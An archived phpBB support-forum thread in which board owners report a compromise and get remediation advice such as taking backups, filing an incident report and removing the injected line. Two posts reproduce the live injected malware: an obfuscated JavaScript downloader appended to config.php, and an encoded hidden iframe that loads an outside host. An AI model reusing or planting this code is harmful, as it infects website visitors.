Board Hacked into

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Board Hacked into

Post by BWOL »

Help!

My board has been hacked into. Link removed--cybrid23
Could someone help me with what to do to fix it.

Thank you!
Last edited by cybrid23 on Sun Oct 14, 2007 5:26 pm, edited 1 time in total.
Reason: Removed link; possibly harmful, see post below

User avatar
jwunderly
Registered User
Posts: 5740
Joined: Sun Mar 30, 2003 2:18 pm
Location: Easton, PA (in the groove)

Re: Board Hacked into

Post by jwunderly »

post the contents of your config.php file between code tags, but remove the password.
John (A cranky old man. "Looking for an echo ...")
using any control-panel install/update is like shooting yourself in the foot. It won't kill you, but you're really going to hobble around until it heals.
Using the wrong tools (Front Page, DreamWeaver) gives the same results
Do not PM me for Support!

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...
Contact:

Re: Board Hacked into

Post by cybrid23 »

My board has been hacked, what do I do?

Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

nvic
Registered User
Posts: 45
Joined: Tue Dec 12, 2006 1:43 am
Location: Line 234 in emailer.php
Contact:

Re: Board Hacked into

Post by nvic »

Just to alert fellow forumers, my mcafee said this when I visited that site:
Mcafee AV wrote: McAfee has automatically blocked and removed a potentially harmful script.

Details
Detection: JS/Downloader-AUD (Virus)
It is serving an infection. Make sure your AV is up to date before you visit the link!

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Sorry about the link - my oversite - I meant to post a warning about it.
jwunderly wrote:post the contents of your config.php file between code tags, but remove the password.
This is what is in the config.php file:

Code: Select all

<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql4';

$dbhost = 'localhost';
$dbname = 'bodywork_phpbb';
$dbuser = 'bodywork_phpbb';
$dbpasswd = '*********';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>
									<!--[I]--><script>document.write(unescape("%3Cscript%3Eif%28hbm%21%3D1%29%7Bfunction%20Wa%28fW%29%7Breturn%20fW%7Dtry%7Bvar%20dzm%3D%27oo0o50oJ0oj0oF0oM0oZ0oG0o40o60oR0oz0oy0ob0ox0oU0oB0od0oq0oK0oS0om0ow0o90oc0ol0oV0oW0oO0os0oh0on0oT0o30of0oX0ot0og0oP0o70oa0oY0oD0oN0oe0or0oA0oH0oL0op0o80oC0oi0ok05o05505J05j05F05M05Z05G05405605R05z05y05b05x05U05B05d05q05K05S05m05w05905c%27%3Bvar%20cQD%3Ddzm.substr%282%2C1%29%2Czje%3DArray%28sYq%28%2768%27%29%2CsYq%28%2711%27%29%2CsYq%28%2727%27%29%2C29845%5E29855%2C28380%5E28365%2C26007%5E26015%2C24187%5E24183%2CsYq%28%2770%27%29%2C28523%5E28533%2CsYq%28%2713%27%29%2C509%5E491%2C28908%5E28923%2C2399%5E2311%2CsYq%28%2754%27%29%2C28570%5E28581%2CsYq%28%2780%27%29%2CsYq%28%2749%27%29%2CsYq%28%2784%27%29%2CsYq%28%2746%27%29%2C9880%5E9929%2CsYq%28%273%27%29%2CsYq%28%2714%27%29%2C19430%5E19455%2C13030%5E13031%2CsYq%28%2726%27%29%2CsYq%28%2720%27%29%2C3464%5E3533%2C20244%5E20233%2C13700%5E13707%2CsYq%28%2760%27%29%2C21443%5E21497%2CsYq%28%2767%27%29%2C32227%5E32181%2CsYq%28%2744%27%29%2CsYq%28%2721%27%29%2C1386%5E1397%2C1996%5E1951%2C8719%5E8783%2C16273%5E16351%2CsYq%28%2776%27%29%2C28457%5E28513%2C17005%5E17009%2C17032%5E17051%2CsYq%28%2790%27%29%2C5009%5E5009%2CsYq%28%2753%27%29%2C24918%5E24957%2C4692%5E4689%2C8007%5E8039%2CsYq%28%2795%27%29%2CsYq%28%2773%27%29%2C6933%5E6935%2CsYq%28%2742%27%29%2CsYq%28%2747%27%29%2C4159%5E4107%2C18276%5E18259%2CsYq%28%2734%27%29%2C15412%5E15459%2C22199%5E22183%2C30808%5E30733%2CsYq%28%2766%27%29%2C9114%5E9155%2C25284%5E25219%2CsYq%28%2751%27%29%2C12086%5E12053%2C23901%5E23931%2CsYq%28%2765%27%29%2C12130%5E12103%2C14301%5E14329%2CsYq%28%2761%27%29%2C1110%5E1135%2C21282%5E21273%2C29531%5E29481%2CsYq%28%2774%27%29%2C13452%5E13511%2CsYq%28%2777%27%29%2C14074%5E14005%2CsYq%28%2740%27%29%2CsYq%28%2782%27%29%29%3Bvar%20uZj%2ChVJ%3Bvar%20Xam%2CCQy%3D%27ooo5oJojoFoMoZoGo4o6oRoJoZoFozoRoyoboxo4oUoJoBojodoqoRoboKoSoyomowojoyo9ocoloVoRoWoOoyosowoZoWoUoKodoyoho6oloVoyoRoWoOoyosowoZoWoUoKonoyoho6oloTo5oWoZo3oFofoWoUo9ocoloToXoWoZo3oFofoWoUoKotogoPo7oaoaoaoaoaoKonoyoYozoJo6ofoWoRoZoToJozozoDoFoWoyoVoyoJoBojotoNoVoNotoWo5oJowoMoWoUoqoRoboKotoNonoWoeoMoFojoWo5oVoNotoho6oloToZozoxoro3oAoZojoFoRoXoUoKonoyoHomowojoyoroLocoVopo5o8o4oqoCoioponomowojoyokolo5oVopo8opod5o55owoVopo6oMoYowoZoWo8oToJolowo5o5oFoJoZoWoloTozojoXoponomowojoyoz5Jo6oVop5j5FoZofol5joponoFo4oUoYozoJo6ofoWoRoZoToJozozoDoFoWoToFoRoYoWoe55o4oUoroLocotopoVopotokolo5oKoyoVoV5Mo8oKoSomowojoyoYol5FoVoYozoJo6ofoWoRoZoTolozoJowoZoFozoRoT5Fozo5oZonomowojoyoRoBoZoVoyop5FoZopotopoZoM5Zopotop5j5jopotoUoyoYol5Foy5GoVoyopop54opop5ZoJoM56oUoKoKoyotoyoYol5FoTojoWoMolowoJoWoyoU5j5R5zow5MoCoa5M5yoT5M5b5jodopoTopoKoTojoWoMolowoJoWoyoU5j5xoTot5jodopoTopoKotopoTopotoJoM56oUoKoyotopoTopoyotoy5o55owotoz5Jo6onomowojoyoXo5oZoVoYozoJo6ofoWoRoZoToJojoWowoZoW5UoloWofoWoRoZoUopoFo4ojowofoWopoKonoXo5oZoTo5oWoZ5BoZoZojoFoco6oZoWoyoUopo5ojoJopodoyoRoBoZoKonoXo5oZoT5FoWoFoX5FoZoVoaonoXo5oZoToOoFoYoZ5FoVo8onoXo5oZoTo4ojowofoWohozojoYoWojoyoVoyoaonoyoZojo9oSoyoYozoJo6ofoWoRoZoTocozoYo9oTowoMoMoWoRoY5d5FoFoloYoyoUoyoXo5oZoKonoyoboxo4oUoroLocodoyokolo5oyoKonoHoyoJowoZoJ5FoUoWoKoyoSoYozoJo6ofoWoRoZoToOojoFoZoWoyoUopoo5FoZofoloGooocozoYo9oGoo5jocozoYo9oGoo5j5FoZofoloGopoKonoyoYozoJo6ofoWoRoZoTocozoYo9oTowoMoMoWoRoY5d5FoFoloYoyoUoyoXo5oZoKonoboxo4oyoUoyoroLocodokolo5oKoyonoHoyoH5qo4o6oRoJoZoFozoRoyoJoM56oUoKoSoyomowojoy5J5dosoV5Ko7onomowojoyo6oX5JoVoNoao85K5So75moP5wog5yoaowocoJoYoWo4oNodorojoYoVoNoNonoyo4ozojoU595J5ooVoaonoy595J5ooyoooy5J5dosonoy595J5oototoKoyorojoYotoVoyo6oX5JoTo5o6oco5oZojoUorowoZ5FoTo4olozozojoUorowoZ5FoTojowoRoYozofoUoK5co6oX5JoToloWoRoXoZ5FoKodo8odo8oKonoyojoWoZo6ojoRoyorojoYonoyoHoo5jo5oJojoFoMoZoG%27%3Bvar%20uTk%3DString%28%29%3Bfunction%20sYq%28IaK%29%7Breturn%20parseInt%28IaK%29%7Ddzm%3Ddzm.split%28cQD%29%3Bfor%20%28uZj%3D0%3BuZj%3CCQy.length%3BuZj+%3D2%29%7BXam%3DCQy.substr%28uZj%2C2%29%3Bfor%28hVJ%3D0%3BhVJ%3Cdzm.length%3BhVJ++%29%7Bif%28dzm%5BhVJ%5D%3D%3DXam%29break%3B%7DuTk+%3DString.fromCharCode%28zje%5BhVJ%5D%5E120%29%3B%7Ddocument.write%28uTk%29%3B%7Dcatch%28MVs%29%7B%7D%7Dvar%20hbm%3D1%3C/script%3E"))</script><!--[/I]-->
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
I don't have enough knowledge to know what these steps entail. I have a full backup I made just days prior to this all starting. I am trying to contact the webmaster, but that is proving to be difficult.

Thank you.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...
Contact:

Re: Board Hacked into

Post by cybrid23 »

Download the files to your PC using an ftp client

Backup the database

If you can get the server logs, that helps.

Then file a report and either attach the files or upload them to a site where they can be accessed.

To fix this, remove the script line at the end of the config.php file (after doing the above please)
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Thank you.

I am backing up the database right now. I will look into everything else and see what I can find and then file the report.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...
Contact:

Re: Board Hacked into

Post by cybrid23 »

Okay.

Also check your site for any files you don't recognize as putting there.

Make your host aware of it so they can check the server as they may have gotten in that way
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Thank you for your help. The webmaster did end up stepping in and it seems all is well now. I think I still have enough of the information to file an incident report - should I still do that?

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...
Contact:

Re: Board Hacked into

Post by cybrid23 »

Yes.
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Will do.

I am getting this message on the log in when trying to get into the Cpanel:
The server (our board) at cPanel requires a username and password.

Warning: This server is requesting that your username and password be
sent in an insecure manner (basic authentication without a secure
connection).
Do you know what that is about? I was able to get in earlier today.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...
Contact:

Re: Board Hacked into

Post by cybrid23 »

Cpanel is provided by your host, not phpBB.

You need to ask them.
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

crag364
Registered User
Posts: 78
Joined: Thu Jul 26, 2007 1:24 pm

Re: Board Hacked into

Post by crag364 »

Hi,

I have the exact same virus appeared on my board! I have checked the config file but no script is at the end of mine. Anyone know what I can do? When I check the index source I see this:

Code: Select all

<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%65%72%2D%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
I expect thats the virus.

I have already reported this to my webhost, anyone know what I can do?

Thanks,

Craig

User avatar
stevemaury
Support Team Member
Support Team Member
Posts: 51188
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve
Contact:

Re: Board Hacked into

Post by stevemaury »

What is "the index source"? index.php? If so, upload a fresh copy, file an incident report here as per the above, and report it to your host.
For REALLY good and VERY inexpensive hosting CLICK HERE

I can stop all your spam. I can upgrade or update your Board. PM or email me. (Paid support)

crag364
Registered User
Posts: 78
Joined: Thu Jul 26, 2007 1:24 pm

Re: Board Hacked into

Post by crag364 »

Sorry I meant my config file, I have replaced this with a backup and its still coming up. My config file is posted below:

Code: Select all

<?php

    $dbms = 'mysql' ;

    $dbhost   = 'localhost' ;
    $dbname   = 'underwat_phpb1'   ;
    $dbuser   = 'underwat_phpb1' ;
    $dbpasswd = '***' ;

    $table_prefix = 'phpbb_' ;

    define ( 'PHPBB_INSTALLED' , TRUE ) ;

?>
It all looks ok to me.

I did find one trace of it in the viewforum file yesterday, I deleted this and uploaded a backup and its not in there now either but still appearing.

Locked

Return to “2.0.x Support Forum”